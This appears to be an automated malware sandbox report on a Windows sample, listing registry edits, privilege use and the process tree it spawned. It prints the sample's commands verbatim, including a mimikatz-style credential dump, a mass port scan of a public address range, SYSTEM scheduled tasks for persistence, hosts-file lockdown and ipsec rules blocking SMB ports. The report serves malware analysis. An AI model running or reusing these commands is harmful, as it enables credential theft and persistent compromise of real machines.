Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eguiemhzp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1320 cmd.exe 924 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000700000002344e-6.dat nsis_installer_2 behavioral2/files/0x0008000000023465-15.dat nsis_installer_1 behavioral2/files/0x0008000000023465-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" euiugba.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ euiugba.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" euiugba.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" euiugba.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" euiugba.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump wewhpbpmh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wewhpbpmh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing euiugba.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" euiugba.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ euiugba.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" euiugba.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 924 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1920 schtasks.exe 2272 schtasks.exe 2348 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe 880 euiugba.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 712 5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 712 5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d.exe Token: SeDebugPrivilege 4004 euiugba.exe Token: SeDebugPrivilege 880 euiugba.exe Token: SeDebugPrivilege 2156 vfshost.exe Token: SeDebugPrivilege 2936 wewhpbpmh.exe Token: SeLockMemoryPrivilege 8 pctkcm.exe Token: SeLockMemoryPrivilege 8 pctkcm.exe Token: SeDebugPrivilege 3588 wewhpbpmh.exe Token: SeDebugPrivilege 3484 wewhpbpmh.exe Token: SeDebugPrivilege 3528 wewhpbpmh.exe Token: SeDebugPrivilege 4172 wewhpbpmh.exe Token: SeDebugPrivilege 924 wewhpbpmh.exe Token: SeDebugPrivilege 2516 wewhpbpmh.exe Token: SeDebugPrivilege 3548 wewhpbpmh.exe Token: SeDebugPrivilege 4972 wewhpbpmh.exe Token: SeDebugPrivilege 3940 wewhpbpmh.exe Token: SeDebugPrivilege 4940 wewhpbpmh.exe Token: SeDebugPrivilege 1504 wewhpbpmh.exe Token: SeDebugPrivilege 4248 wewhpbpmh.exe Token: SeDebugPrivilege 1480 wewhpbpmh.exe Token: SeDebugPrivilege 548 wewhpbpmh.exe Token: SeDebugPrivilege 3916 wewhpbpmh.exe Token: SeDebugPrivilege 5076 wewhpbpmh.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 712 5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d.exe 712 5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d.exe 4004 euiugba.exe 4004 euiugba.exe 880 euiugba.exe 880 euiugba.exe 3268 xohudmc.exe 3076 tyxtue.exe 2404 euiugba.exe 2404 euiugba.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 712 wrote to memory of 1320 712 5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d.exe 82 PID 712 wrote to memory of 1320 712 5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d.exe 82 PID 712 wrote to memory of 1320 712 5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d.exe 82 PID 1320 wrote to memory of 924 1320 cmd.exe 84 PID 1320 wrote to memory of 924 1320 cmd.exe 84 PID 1320 wrote to memory of 924 1320 cmd.exe 84 PID 1320 wrote to memory of 4004 1320 cmd.exe 89 PID 1320 wrote to memory of 4004 1320 cmd.exe 89 PID 1320 wrote to memory of 4004 1320 cmd.exe 89 PID 880 wrote to memory of 1904 880 euiugba.exe 91 PID 880 wrote to memory of 1904 880 euiugba.exe 91 PID 880 wrote to memory of 1904 880 euiugba.exe 91 PID 1904 wrote to memory of 2020 1904 cmd.exe 93 PID 1904 wrote to memory of 2020 1904 cmd.exe 93 PID 1904 wrote to memory of 2020 1904 cmd.exe 93 PID 1904 wrote to memory of 3252 1904 cmd.exe 94 PID 1904 wrote to memory of 3252 1904 cmd.exe 94 PID 1904 wrote to memory of 3252 1904 cmd.exe 94 PID 1904 wrote to memory of 3468 1904 cmd.exe 95 PID 1904 wrote to memory of 3468 1904 cmd.exe 95 PID 1904 wrote to memory of 3468 1904 cmd.exe 95 PID 1904 wrote to memory of 3568 1904 cmd.exe 96 PID 1904 wrote to memory of 3568 1904 cmd.exe 96 PID 1904 wrote to memory of 3568 1904 cmd.exe 96 PID 1904 wrote to memory of 224 1904 cmd.exe 97 PID 1904 wrote to memory of 224 1904 cmd.exe 97 PID 1904 wrote to memory of 224 1904 cmd.exe 97 PID 1904 wrote to memory of 3168 1904 cmd.exe 98 PID 1904 wrote to memory of 3168 1904 cmd.exe 98 PID 1904 wrote to memory of 3168 1904 cmd.exe 98 PID 880 wrote to memory of 2084 880 euiugba.exe 102 PID 880 wrote to memory of 2084 880 euiugba.exe 102 PID 880 wrote to memory of 2084 880 euiugba.exe 102 PID 880 wrote to memory of 3232 880 euiugba.exe 104 PID 880 wrote to memory of 3232 880 euiugba.exe 104 PID 880 wrote to memory of 3232 880 euiugba.exe 104 PID 880 wrote to memory of 1920 880 euiugba.exe 106 PID 880 wrote to memory of 1920 880 euiugba.exe 106 PID 880 wrote to memory of 1920 880 euiugba.exe 106 PID 880 wrote to memory of 388 880 euiugba.exe 110 PID 880 wrote to memory of 388 880 euiugba.exe 110 PID 880 wrote to memory of 388 880 euiugba.exe 110 PID 388 wrote to memory of 3752 388 cmd.exe 112 PID 388 wrote to memory of 3752 388 cmd.exe 112 PID 388 wrote to memory of 3752 388 cmd.exe 112 PID 3752 wrote to memory of 2776 3752 wpcap.exe 113 PID 3752 wrote to memory of 2776 3752 wpcap.exe 113 PID 3752 wrote to memory of 2776 3752 wpcap.exe 113 PID 2776 wrote to memory of 2284 2776 net.exe 115 PID 2776 wrote to memory of 2284 2776 net.exe 115 PID 2776 wrote to memory of 2284 2776 net.exe 115 PID 3752 wrote to memory of 4416 3752 wpcap.exe 116 PID 3752 wrote to memory of 4416 3752 wpcap.exe 116 PID 3752 wrote to memory of 4416 3752 wpcap.exe 116 PID 4416 wrote to memory of 1744 4416 net.exe 118 PID 4416 wrote to memory of 1744 4416 net.exe 118 PID 4416 wrote to memory of 1744 4416 net.exe 118 PID 3752 wrote to memory of 4112 3752 wpcap.exe 119 PID 3752 wrote to memory of 4112 3752 wpcap.exe 119 PID 3752 wrote to memory of 4112 3752 wpcap.exe 119 PID 4112 wrote to memory of 2972 4112 net.exe 121 PID 4112 wrote to memory of 2972 4112 net.exe 121 PID 4112 wrote to memory of 2972 4112 net.exe 121 PID 3752 wrote to memory of 1076 3752 wpcap.exe 122
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1312
-
C:\Windows\TEMP\tzgyhthhu\pctkcm.exe"C:\Windows\TEMP\tzgyhthhu\pctkcm.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:8
-
-
C:\Users\Admin\AppData\Local\Temp\5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d.exe"C:\Users\Admin\AppData\Local\Temp\5fe8ffd9c81289afee5142a569bbe89830311d83875b718f183087736e10522d.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:712 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\gezmcuhh\euiugba.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:924
-
-
C:\Windows\gezmcuhh\euiugba.exeC:\Windows\gezmcuhh\euiugba.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4004
-
-
-
C:\Windows\gezmcuhh\euiugba.exeC:\Windows\gezmcuhh\euiugba.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:880 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2020
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:3252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3468
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:3568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:224
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3168
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2084
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3232
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1920
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\thgpqiiyn\zymuetvrm\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\thgpqiiyn\zymuetvrm\wpcap.exeC:\Windows\thgpqiiyn\zymuetvrm\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2776 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:2284
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4416 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1744
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:2972
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:1076 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:3680
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4784 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1088 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2644
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4924 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3520
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4504
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\thgpqiiyn\zymuetvrm\glithlcwh.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\thgpqiiyn\zymuetvrm\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:2164 -
C:\Windows\thgpqiiyn\zymuetvrm\glithlcwh.exeC:\Windows\thgpqiiyn\zymuetvrm\glithlcwh.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\thgpqiiyn\zymuetvrm\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\thgpqiiyn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\thgpqiiyn\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:4008 -
C:\Windows\thgpqiiyn\Corporate\vfshost.exeC:\Windows\thgpqiiyn\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pazzgwtck" /ru system /tr "cmd /c C:\Windows\ime\euiugba.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4940 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "pazzgwtck" /ru system /tr "cmd /c C:\Windows\ime\euiugba.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "uzmeguupv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gezmcuhh\euiugba.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:1176 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4268
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "uzmeguupv" /ru system /tr "cmd /c echo Y|cacls C:\Windows\gezmcuhh\euiugba.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2272
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ruzpterzk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tzgyhthhu\pctkcm.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2144 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2988
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ruzpterzk" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tzgyhthhu\pctkcm.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2348
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:5116
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4280
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3428
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4592
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4800
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4416
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4180
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4336
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2808
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4576
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3388
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2324
-
-
